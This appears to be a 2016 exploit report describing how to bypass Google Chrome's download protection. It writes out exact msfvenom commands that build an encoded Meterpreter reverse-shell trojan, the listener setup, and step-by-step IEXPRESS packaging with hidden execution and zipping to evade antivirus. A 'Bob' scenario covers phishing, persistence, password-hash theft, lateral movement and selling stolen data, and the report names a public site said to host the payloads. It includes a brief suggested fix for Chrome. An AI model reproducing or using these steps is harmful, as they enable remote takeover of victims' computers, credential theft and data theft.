Google Chrome Bug/Exploit report

This is a download protection bypass

DATE: 7/1/16 
CHROME VERSION: 51.0.2704.106 m (64-bit) stable
(Exploit should work with all chrome versions)
OS: Kali linux 2.0/Windows 10 home 64-bit

EXPLOIT SUMMARY

This exploit bypasses the Google Chrome Download Protection. It does not bypass the google drive 
download protection(in its current state). This exploit is also commonly caught during launch by common anti-virus 
programs. If the virus is launched on the target machine, the attacker will be able to gain a 
Meterpreter reverse tcp shell for remote command execution. This exploit was built in Kali Linux
using the Metasploit Framework developed by Rapid7. This virus is classified as a trojan virus.
It will only work on systems of x86 and x64 architecture on windows systems. The virus was built 
using msfvenom, the exact command used was(linux) root@kali:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe > /root/Desktop/programname.exe
This generated an executable file for windows x86 encoded with shikata ga nai, a very powerful and commonly used 
payload encoder, using 9 iterations, meaning the paylaod was encoded 9 times. This payload was then put on a windows system and using IEXPRESS, 
a built in windows program, I was able to put the payload, along with several dummy files in a 
typical windows installer in executable format. After being put in a zip file to evade further detection
the file could be uploaded to a file sharing site, I specifically used MediaFire. Google Drive could
also be used if the size of the payload was increased above 25 mb. This would make the file too
large for Google Drive's antivirus scanners to pick up on it. This file will not be discovered 
by antivirus(discluding google drive's) until the program is run. At this point the program would
have already downloaded, bypassing google chrome's built in antivirus scanner. If the victim is not using antivirus,
or is using one that can be evaded using Shikata ga nai, the program will extract and run automatically, 
opening the reverse shell instantly on the attackers machine. Through this meterpreter shell, the attacker
can grab major pieces of information such as all the password hashes of the SAM file, gain access
to webcams, enable RDP ports, run persistence, kill antivirus, run keyloggers, and grab tons of information.

HOW IT WORKS

This exploit is able to avoid Chrome's download protection in two direct ways. First off, the virus is
encoded, adding another step for AV; this step doesn't have a major effect on the exploit. This 
exploit also works due to the way the exe is packaged and compressed. Several copies of the exploit
are packaged into an executable. This means the direct executable files are not immediatly available to 
a browser such as Chrome or any antivirus. Furthermore, by putting some dummy files in the Package, antivirus 
programs will be even less suspicious of the trojan. Once the package is completed using IEXPRESS, the 
program is put into a zip file to make it smaller(a quicker download/more steps for AV). From there
It can be uploaded to file sharing sites and downloaded to a victim.

POSSIBLE FIXES

First off, I am no software engineer, but from what I know about hacking, here are some suggestions to 
help stop this simple bypass. Since it is all packaged, Chrome's download protection should unzip the 
file, then sandbox the executable, during the sandbox, Chrome's anti-malware should unpackage the 
executable, then scan each individual file that was in the package. Currently, I think Chrome's 
download protection will just scan the installer, or package of executables, meaning the infected 
content within is not scanned.

SCENARIO

This is a scenario to represent the simplicity and effectiveness of this vulnerability to a hacker.	

	Hi, I am Bob, and I want to gain full access to somebody's computer system. I will go into 
my Kali Linux computer and quickly create a payload and listener in metasploit(takes about 2 mins). From
there, I will bring the payload over to my windows computer, then get some dummy files and make a
packaged executable with all the files. Now I'll compress it and I'm ready to start. I'll run
Maltego and company stalker to gain all the email addresses associated with a domain or company.
From there I'll run a mass mailer to send out an email with the payload attached, using good
social engineering; eventually one of the company staffers will run the file, therefore providing
me full access. Now on my kali machine, I have a listener set up and I'm waiting for my connection.
Boom, now I've gotten a meterpreter shell for remote command execution. The first things I'll do are 
migrate the shell to notepad, run persistence, and grab password hashes. This way I'll be
quiter, have all the password hashes, and persistence. I could quickly run the hashes through
a rainbow table(since they are in lm:ntlm form) and get the passwords in a day or two. Then I
could easily launch more payloads by going to the companies area with all of the passwords.
I would then use psexec, a powershell login, and be able to gain any information I wanted. 
Then I could either sell this information to a black hat or use it to steal from the company.
(I wouldn't do this, Bob would)

PROBLEMS WITH MALWARE

-On windows operating systems with smartscreen filter, this program will be flagged as an unrecognized application,
thus requiring the user to apply administrative permissions. This can be avoided with some smart social engineering.

-From the testing I have done, this exploit will not work on 32 bit systems.

-There is currently no mac version

EXACT STEPS FOR EXPLOIT REPRODUCTION

In kali linux 2.0 64-bit

-create the payload

*launch shell window
root@kali:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16(your local ip) LPORT=4444(the listening port) -e x86/shikata_ga_nai -i 9 -f exe > /root/Desktop/chrome_exploit.exe

-set up the listener

*new shell windows
root@kali:msfconsole
msfconsole:use multi/handler
msfconsole: exploit(multi)set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msfconsole: exploit(multi)set lport 4444
lport => 4444
msfconsole: exploit(multi)set lhost 192.168.1.16
lhost => 192.168.1.16
msfconsole: exploit(multi)run

-transfer the file

*use a USB drive or the internet to put payload on a windows system

In windows 10 64-bit home version

-get files ready

*put the payload generated in kali on the windows system
*get dummy files from anything(optional to evade google drives scanner)
*get 3 copies of the payload 

-prepare package

*run iexpress 
*create new self extraction directive file
*extract files and run an installation command
*set package title to whatever is wanted
*No prompt
*Do not display a license
*add the dummy files, and all 3 copies of the payload
*set install program to one copy of payload
*note* the install program is going to be specifically used later
*set post install command to a different copy of the payload
*set show window to hidden
*set display message to something like "Thanks for downloading"
*set the target path the the same file I noted earlier
*note* also choose hide file extraction progress animation from user
*choose not restart
*dont save an SED
*click next and create the package

-compression/uploading the package

*using a compression application such as Winzip, put the previously noted copy of the payload in
to a folder, then compress the folder to zip format.
*upload this zipped folder to any file sharing site, if its bigger than 25mb, google drive can be used.
*download the file on a target machine anywhere connected to the internet.
*once the fiile is run, the listener in kali will send a stage, then a meterpreter shell is opened

SAMPLE

-I created a sample website using weebly to show how this can be exploited, and using social engineering,
one can be easily convinced to download and run the files.
-The website is www.newsolutionsinc.weebly.com. 
-On the download page there are several different versions of the payload.
-There is no listener active for these payloads so there is no harm in running them.